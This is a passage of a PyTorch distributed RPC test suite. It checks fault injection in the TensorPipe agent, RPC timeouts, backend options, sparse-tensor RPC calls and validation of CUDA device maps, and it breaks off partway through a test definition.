def test_verify_backend_options(self):
    self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
    self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
    self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
    self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
    self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
    self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
    # The decorator's faulty_messages list must reach the backend options.
    self.assertEqual(
        set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
        set(self.rpc_backend_options.messages_to_fail),
    )
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
    self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
    self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
    """A dropped remote-call message must poison later forks of the RRef."""
    if self.rank != 0:
        return
    dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
    dst_worker = "worker{}".format(dst_rank)
    # Since we fail python_remote_call messages synchronously, the future
    # corresponding to this remote call will be marked with an error when
    # this function returns.
    rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
    # Call to ensure pending callbacks are run.
    wait_until_pending_futures_and_users_flushed()
    # Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
    with self.assertRaisesRegex(RuntimeError, "RRef creation"):
        rref._serialize()
    # Test that using RRef as arg over RPC (which forks) results in the same
    # error
    with self.assertRaisesRegex(RuntimeError, "RRef creation"):
        rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
    self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
    # dst == own rank: dropped creation message sent to self.
    self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
    """An rpc.remote whose creation message is dropped must fail to_here()."""
    if self.rank != 0:
        return
    # test the case where rpc.remote() message creation is completely dropped.
    dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
    dst_worker = "worker{}".format(dst_rank)
    # Since we fail the remote-call messages synchronously, the future
    # corresponding to this remote call will be marked with an error when
    # this function returns.
    rref = rpc.remote(dst_worker, func, args=args)
    # Call to ensure pending callbacks are run.
    wait_until_pending_futures_and_users_flushed()
    with self.assertRaisesRegex(RuntimeError, "RRef creation"):
        rref.to_here()
    # Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
    # on the owning nodes, this is expected because the OwnerRRef was never
    # successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
    func = torch.add
    args = (torch.tensor(1), torch.tensor(1))
    self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
    func = torch.add
    args = (torch.tensor(1), torch.tensor(1))
    self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
    func = my_sleep_func
    args = (2,)
    self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
    func = my_sleep_func
    args = (2,)
    self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
    """Creation eventually succeeds on the owner, but the creator's
    future times out first; later to_here() must see the failure."""
    if self.rank != 0:
        return
    # Test the case where remote message is eventually processed on the owner,
    # but the future on the creator times out before the response comes back.
    dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
    dst_worker = "worker{}".format(dst_rank)
    # 1 ms timeout (the delay fixtures hold the message for >= 1 s).
    rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
    # Future corresponding to the remote creation should time out.
    expected_error = self.get_timeout_error_regex()
    with self.assertRaisesRegex(RuntimeError, expected_error):
        rref._get_future().wait()
    # Call to ensure pending callbacks are run.
    wait_until_pending_futures_and_users_flushed()
    # to_here() should now pick up that rpc.remote() creation has failed.
    with self.assertRaisesRegex(RuntimeError, "RRef creation"):
        rref.to_here()
    # Test the case where rpc.remote() times out, but to_here() has already
    # started blocking before.
    # NOTE: we only test this when not sending to self, as to_here() calls
    # calls localValue(), which does not send an RPC and thus does not have
    # a timeout. This can be supported by allowing future.wait() to
    # take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
    if dst_rank != self.rank:
        slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
        with self.assertRaisesRegex(RuntimeError, expected_error):
            # to_here() should raise timeout error, since it does not know about the
            # status of rpc.remote().
            slow_rref.to_here(0.001)
    # Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
    # but this can be a noop since it may not exist on the owner yet. Later,
    # the owner can process the RRef creation and wait for the delete message,
    # thus leading to a timeout.
    # Therefore, we wait until we get notification that pending owners have
    # been confirmed before sending out RRefUserDeletes.
    if dst_rank != self.rank:
        wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
# Wrappers: UDF / builtin / TorchScript remote calls under message delay,
# both to a peer and to self.
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
    func = my_sleep_func
    args = (2,)
    self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
    func = my_sleep_func
    args = (1,)
    self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
    faulty_messages=[],
    messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
    func = torch.add
    args = (torch.tensor(1), torch.tensor(1))
    self._test_remote_message_delay_timeout(func, args)
@dist_init(
    faulty_messages=[],
    messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
    func = torch.add
    args = (torch.tensor(1), torch.tensor(1))
    self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
    faulty_messages=[],
    messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
    func = my_script_func
    args = (torch.tensor(1),)
    self._test_remote_message_delay_timeout(func, args)
@dist_init(
    faulty_messages=[],
    messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
    func = my_script_func
    args = (torch.tensor(1),)
    self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
    """to_here() with a short timeout must fail; the default must succeed."""
    if self.rank != 0:
        return
    dst_rank = (self.rank + 1) % self.world_size
    dst_worker = "worker{}".format(dst_rank)
    rref = rpc.remote(
        dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
    )
    expected_error = self.get_timeout_error_regex()
    # The fetch is delayed 1 s (see decorator), so 10 ms must time out.
    with self.assertRaisesRegex(RuntimeError, expected_error):
        rref.to_here(0.01)
    # The default timeout outlasts the delay.
    rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
    """Per-call and default timeouts for builtin-op RPCs under message delay."""
    next_rank = (self.rank + 1) % self.world_size
    dst_worker = worker_name(next_rank)
    expected_error = self.get_timeout_error_regex()
    # PYTHON_CALL message types which correspond to Python UDF over RPC
    # by default get a delay (see faulty_rpc_agent_test_fixture)
    with self.assertRaisesRegex(RuntimeError, expected_error):
        rpc.rpc_sync(
            dst_worker,
            torch.add,
            args=(torch.tensor(1), torch.tensor(1)),
            timeout=1,
        )
    fut = rpc.rpc_async(
        dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
    )
    with self.assertRaisesRegex(RuntimeError, expected_error):
        fut.wait()
    # Ensure that the currently set default timeout is large enough such
    # that RPCs with delays still complete.
    fut = rpc.rpc_async(
        dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
    )
    fut.wait()
    # Ensure timeout if we set a new default and don't override
    rpc._set_rpc_timeout(0.001)
    fut = rpc.rpc_async(
        dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
    )
    with self.assertRaisesRegex(RuntimeError, expected_error):
        fut.wait()
    # Ensure run to completion if we specify timeout of 0
    fut = rpc.rpc_async(
        dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
    )
    fut.wait()
    # Reset for clean shutdown
    rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
    """Per-call and default timeouts for TorchScript RPCs under delay.

    SCRIPT_CALL messages are delayed 1.5 s (see the decorator), so a 1 s
    timeout must fire while the stock default must not. Also removed a
    redundant second ``rpc._set_rpc_timeout(0.001)`` before the
    ``timeout=0`` call — the value was already 0.001 and the parallel
    builtin-timeout test has no such line.
    """
    next_rank = (self.rank + 1) % self.world_size
    dst_worker = worker_name(next_rank)
    expected_error = self.get_timeout_error_regex()
    # 1 s timeout < 1.5 s delay: both sync and async must time out.
    with self.assertRaisesRegex(RuntimeError, expected_error):
        rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
    fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
    with self.assertRaisesRegex(RuntimeError, expected_error):
        fut.wait()
    # Ensure that the currently set default timeout is large enough such
    # that RPCs with delays still complete.
    fut = rpc.rpc_async(
        dst_worker, my_script_func, args=(torch.tensor(1),)
    )
    fut.wait()
    # Ensure timeout if we set a new default and don't override
    rpc._set_rpc_timeout(0.001)
    fut = rpc.rpc_async(
        dst_worker, my_script_func, args=(torch.tensor(1),)
    )
    with self.assertRaisesRegex(RuntimeError, expected_error):
        fut.wait()
    # Ensure run to completion if we specify timeout of 0 (overrides the
    # tiny default set above).
    fut = rpc.rpc_async(
        dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
    )
    fut.wait()
    # Reset for clean shutdown
    rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
    """Tests specific to the TensorPipe RPC agent."""

    def test_mismatched_type_for_options(self):
        """init_rpc with the TENSORPIPE backend must reject foreign options."""
        # An exception should be raised if the options are not an instance of
        # TensorPipeRpcBackendOptions.
        rpc_backend_options = FooBackendOptions(self.init_method)
        with self.assertRaisesRegex(
            TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
        ):
            rpc.init_rpc(
                name=worker_name(self.rank),
                rank=self.rank,
                world_size=self.world_size,
                backend=rpc.BackendType.TENSORPIPE,
                rpc_backend_options=rpc_backend_options,
            )
def test_infer_backend_from_options(self):
    """TensorPipe options alone are enough for init_rpc to pick the backend."""
    rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
        init_method=self.init_method
    )
    rpc.init_rpc(
        name=worker_name(self.rank),
        rank=self.rank,
        world_size=self.world_size,
        # Do _not_ pass backend.
        rpc_backend_options=rpc_backend_options,
    )
    # The inferred agent must be a TensorPipeAgent.
    self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
    """num_worker_threads passed via options must reach the agent's pool."""
    NUM_THREADS = 27
    rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
        init_method=self.rpc_backend_options.init_method,
        num_worker_threads=NUM_THREADS
    )
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=rpc_backend_options,
    )
    # Verify through the agent's debug info rather than the options object.
    info = rpc.api._get_current_rpc_agent().get_debug_info()
    self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
    rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
    """rpc_timeout given in options must become the process-wide default."""
    timeout = 0.5
    rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
        init_method=self.rpc_backend_options.init_method,
        num_worker_threads=self.rpc_backend_options.num_worker_threads,
        rpc_timeout=timeout
    )
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=rpc_backend_options,
    )
    default_timeout = rpc.get_rpc_timeout()
    self.assertEqual(default_timeout, timeout)
    rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
    """Constructing TensorPipeRpcBackendOptions with a timedelta must raise.

    rpc_timeout is expected to be a float number of seconds; the binding
    rejects a datetime.timedelta. Cleanup: dropped the unused
    ``rpc_backend_options =`` binding inside the assertRaises block — the
    constructor is expected to raise, so nothing is ever assigned.
    """
    from datetime import timedelta
    timeout = timedelta()
    # Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
    with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
        rpc.TensorPipeRpcBackendOptions(
            init_method=self.rpc_backend_options.init_method,
            num_worker_threads=self.rpc_backend_options.num_worker_threads,
            rpc_timeout=timeout,
        )
@dist_init
def _test_rref_get_type_timeout(self, blocking):
    # Test where we try to get the type of a RRef from an owner, but RRef
    # creation is slower than timeout passed into _get_type.
    dst_rank = (self.rank + 1) % self.world_size
    dst = worker_name(dst_rank)
    # The True flag presumably makes MyClass construction slow on the
    # owner — confirm against MyClass's definition.
    slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
    timeout = 0.5
    expected_err = self.get_timeout_error_regex()
    # Blocking: blocks on inline call
    if blocking:
        with self.assertRaisesRegex(RuntimeError, expected_err):
            slow_rref._get_type(timeout=timeout, blocking=blocking)
    # Non-blocking: blocks on wait
    else:
        fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
        with self.assertRaisesRegex(RuntimeError, expected_err):
            fut.wait()
    # FIXME We wait until the remote completed creating the OwnerRRef
    # because there's currently a race if we shut down RPC before that.
    slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
    self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
    self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
    """Calling an overloaded torch op with no args must fail schema matching.

    Fixes the expected-regex typo: the runtime message reads
    "failed to match any schema", not "failed to many any schema".
    """
    dst = worker_name((self.rank + 1) % self.world_size)
    with self.assertRaisesRegex(
        RuntimeError, "Overloaded torch operator invoked from Python failed to match any schema"
    ):
        rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
    """RRef proxy calls (rpc_sync/rpc_async/remote) must honor timeouts."""
    dst_rank = (self.rank + 1) % self.world_size
    dst = worker_name(dst_rank)
    rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
    # Ensure RRef is created on remote node.
    rref.to_here()
    rref_api = getattr(rref, rref_proxy_api)
    self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
    expected_error = self.get_timeout_error_regex()
    timeout = 2
    # my_slow_method presumably outlasts the 2 s timeout — confirm in MyClass.
    with self.assertRaisesRegex(RuntimeError, expected_error):
        result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
        if rref_api == rref.rpc_async:
            result.wait()
        elif rref_api == rref.remote:
            result._get_future().wait()
    # Case where rpc.remote() is stuck and exceeds timeout
    slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
    timeout = 0.01
    rref_api = getattr(slow_rref, rref_proxy_api)
    # Note that even when we call rref.rpc_async() in this case, we
    # time out in future creation, not waiting for future. This is because
    # rref proxy function calls rref._get_type before returning future,
    # which blocks on the RRef being created on owner node, until the
    # specified timeout.
    with self.assertRaisesRegex(RuntimeError, expected_error):
        result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
        # rpc_async returns immediately and surface a timeout through wait()
        if rref_api == slow_rref.rpc_async:
            result.wait()
    # FIXME We wait until the remote completed creating the OwnerRRef
    # because there's currently a race if we shut down RPC before that.
    slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
    # Exercise all three proxy flavors.
    for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
        self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
    """Small MNIST-style CNN for CUDA RPC tests.

    forward() deliberately stalls the current CUDA stream so that
    stream-synchronization bugs in the RPC layer become visible.
    """
    def __init__(self, device):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(1, 16, 3, 1),
            nn.ReLU(),
            nn.Conv2d(16, 32, 3, 1),
            nn.ReLU(),
            nn.MaxPool2d(2),
            nn.Flatten(1),
            nn.Linear(4608, 128),
            nn.ReLU(),
            nn.Linear(128, 10),
        ).to(device)
        self.device = device
    def forward(self, x, is_rref=False):
        # Accept either a tensor or an RRef wrapping one.
        x = x.to_here() if is_rref else x
        with torch.cuda.stream(torch.cuda.current_stream(self.device)):
            # intentionally adding delay to current CUDA stream
            torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
            return self.net(x)
    def __getstate__(self):
        # return an empty dict to avoid inspecting the model contents on the
        # owner
        return {}
@dist_init
def test_send_to_rank_sparse(self):
    """Round-trip sparse tensors — uncoalesced and coalesced — through
    torch.add in every RPC execution mode."""
    dst_rank = (self.rank + 1) % self.world_size
    # First pass uses the builder's defaults, second forces coalescing.
    for build_kwargs in ({}, {"coalesce": True}):
        for exec_mode in (RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE):
            x = build_sparse_tensor(**build_kwargs)
            y = build_sparse_tensor(**build_kwargs)
            ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
            self.assertEqual(x + y, ret)
# Sparse-tensor variants of the self/remote RRef-argument tests; each
# delegates to a shared helper with freshly built sparse inputs.
@dist_init
def test_self_py_udf_remote_sparse(self):
    self._self_py_udf_remote(
        rpc.get_worker_info(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor()
    )
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
    dst = worker_name((self.rank + 1) % self.world_size)
    self._self_remote_rref_as_rpc_arg(
        dst,
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor()
    )
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
    self._self_remote_rref_as_rpc_arg(
        rpc.get_worker_info(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor()
    )
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
    dst = worker_name((self.rank + 1) % self.world_size)
    self._self_remote_rref_as_remote_arg(
        dst,
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor()
    )
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
    self._self_remote_rref_as_remote_arg(
        rpc.get_worker_info(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor()
    )
# Sparse variants of the world-size-one / multi-rpc / wait-all-workers tests.
def test_world_size_one_sparse(self):
    self._world_size_one(
        build_sparse_tensor(),
        build_sparse_tensor()
    )
@dist_init
def test_multi_rpc_sparse(self):
    self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
    self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
    self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
    """A list containing sparse tensors must survive pickling over rpc_sync."""
    dst_rank = (self.rank + 1) % self.world_size
    tensors = [build_sparse_tensor(), build_sparse_tensor()]
    remote_sum = rpc.rpc_sync(
        worker_name(dst_rank), my_container_sum, args=(tensors,)
    )
    # The remote result must equal the locally computed container sum.
    self.assertEqual(remote_sum, my_container_sum(tensors))
# Sparse-tensor variants of the nested / stress / RRef-argument tests;
# each delegates to a dense/sparse-agnostic helper with sparse inputs.
@dist_init
def test_nested_rpc_sparse(self):
    self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
    self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
    self._builtin_remote_ret(
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor() * 2
    )
@dist_init
def test_builtin_remote_self_sparse(self):
    self._builtin_remote_self(
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor() * 2
    )
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
    self._test_multi_remote_call(
        torch.add, True,
        args_fn=RpcTest._multi_args_fn
    )
@dist_init
def test_multi_py_udf_remote_sparse(self):
    self._test_multi_remote_call(
        my_function,
        True,
        kwargs_fn=RpcTest._multi_kwargs_fn
    )
@dist_init
def test_py_rref_args_sparse(self):
    self._py_rref_args(
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor() * 4
    )
@dist_init
def test_py_rref_args_user_share_sparse(self):
    self._py_rref_args_user_share(
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor() * 6
    )
@dist_init
def test_py_rpc_rref_args_sparse(self):
    self._py_rpc_rref_args(
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor(),
        build_sparse_tensor() * 6
    )
@dist_init
def test_nested_remote_sparse(self):
    self._nested_remote(
        nested_remote_sparse,
        build_sparse_tensor() + build_sparse_tensor()
    )
@dist_init
def test_nested_rref_sparse(self):
    self._nested_rref(
        nested_rref_sparse,
        build_sparse_tensor() * 2,
        build_sparse_tensor() * 2
    )
@dist_init
def test_nested_rref_stress_sparse(self):
    self._nested_rref_stress(
        nested_rref_sparse,
        build_sparse_tensor() * 2,
        build_sparse_tensor() * 2
    )
@dist_init
def test_my_parameter_server_sparse(self):
    # Sparse counterpart of RpcTest.test_my_parameter_server.
    self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
    """CUDA / device-map tests for the TensorPipe RPC agent."""
    def _test_device_maps(self, options, errMsg):
        """Assert that rpc.init_rpc rejects *options* with a ValueError matching *errMsg*.

        After the failed init, no RPC agent must be left installed.
        """
        with self.assertRaisesRegex(ValueError, errMsg):
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=options,
            )
        # init_rpc failed, so the process must not report an active agent.
        self.assertFalse(rpc.api._is_current_rpc_agent_set())
    # --- Validation of malformed device maps: each test builds an invalid
    # --- mapping and expects init_rpc (or set_device_map itself) to reject it.
    @skip_if_lt_x_gpu(2)
    def test_device_maps_wrong_worker_name(self):
        """A device map keyed by a non-existent worker name must be rejected."""
        options = self.rpc_backend_options
        options.set_device_map("none_exist", {0: 1})
        self._test_device_maps(
            options,
            errMsg="Node worker0 has invalid target node names in its device maps"
        )
    @skip_if_lt_x_gpu(1)
    def test_device_maps_invalid_max_local_device(self):
        """A source device index >= device_count must be rejected."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, {torch.cuda.device_count(): 0})
        self._test_device_maps(
            options,
            errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
        )
    @skip_if_lt_x_gpu(1)
    def test_device_maps_invalid_max_remote_device(self):
        """A target device index >= device_count must be rejected."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, {0: torch.cuda.device_count()})
        self._test_device_maps(
            options,
            errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
        )
    @skip_if_lt_x_gpu(2)
    def test_device_maps_many_to_one(self):
        """Two source devices mapping to the same target must be rejected."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, {1: 0})
        options.set_device_map(dst, {0: 0})
        self._test_device_maps(
            options,
            errMsg="Node worker0 has duplicated target devices in its device map for worker1"
        )
    @skip_if_lt_x_gpu(2)
    def test_device_maps_one_to_many(self):
        """Remapping the same source device must be rejected by set_device_map itself."""
        if self.rank == 0:
            options = self.rpc_backend_options
            dst = worker_name((self.rank + 1) % self.world_size)
            options.set_device_map(dst, {0: 1})
            with self.assertRaisesRegex(
                ValueError, "`set_device_map` only supports 1-to-1 mapping"
            ):
                options.set_device_map(dst, {0: 0})
    @skip_if_lt_x_gpu(1)
    def test_device_maps_invalid_min_device(self):
        """Negative device indices on either side must be rejected."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        with self.assertRaisesRegex(
            RuntimeError, "Device index must not be negative"
        ):
            options.set_device_map(dst, {-1: 0})
        with self.assertRaisesRegex(
            RuntimeError, "Device index must not be negative"
        ):
            options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
    @skip_if_lt_x_gpu(2)
    def test_device_maps_gpu(self):
        """A swapped device map {0: 1, 1: 0} moves args to cuda:1 remotely and the
        result back to cuda:1 locally (the remote returns on cuda:0)."""
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size)
        options.set_device_map(dst, {0: 1, 1: 0})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        # Args sent on cuda:0 arrive on cuda:1; _gpu_add asserts that and
        # returns on cuda:0, which maps back to local cuda:1.
        ret = rpc.rpc_sync(
            dst,
            TensorPipeAgentCudaRpcTest._gpu_add,
            args=(torch.zeros(2).to(0), torch.ones(2).to(0))
        )
        self.assertEqual(ret.device, torch.device(1))
        self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
        rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
    def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
        """Round-trip an add through *device_map* and check the result's placement.

        x/y are created on x_from/y_from locally; the map determines where they
        land remotely (x_to/y_to) and where the z_to result comes back (via the
        reverse map). *dst* defaults to the next worker; *fn* defaults to
        _gpu_add_given_devices.
        """
        fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
        x_to = device_map[x_from]
        y_to = device_map[y_from]
        options = self.rpc_backend_options
        dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
        options.set_device_map(dst, device_map)
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        x = torch.zeros(2).to(x_from)
        y = torch.ones(2).to(y_from)
        ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
        # Responses travel through the inverse of the request map (1-to-1 by
        # construction), so the remote z_to maps back to local z_from.
        reverse_device_map = {device_map[k] : k for k in device_map}
        z_from = reverse_device_map[z_to]
        ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
        self.assertEqual(ret_device, z_from)
        self.assertEqual(ret, torch.ones(2).to(z_from))
        rpc.shutdown()
    # --- Basic device-map permutations over cpu / cuda:0 / cuda:1, all
    # --- delegating to _test_device_maps_gpu with different endpoints.
    def test_device_map_cpu(self):
        """cpu -> cpu mapping; no GPU required."""
        self._test_device_maps_gpu(
            x_from="cpu",
            y_from="cpu",
            z_to="cpu",
            device_map={"cpu" : "cpu"},
            fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
        )
    @skip_if_lt_x_gpu(1)
    def test_device_map_cpu_to_gpu_default(self):
        """cpu args mapped onto the default GPU (cuda:0)."""
        self._test_device_maps_gpu(
            x_from="cpu",
            y_from="cpu",
            z_to=0,
            device_map={"cpu" : 0},
            fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
        )
    @skip_if_lt_x_gpu(2)
    def test_device_map_cpu_to_gpu_non_default(self):
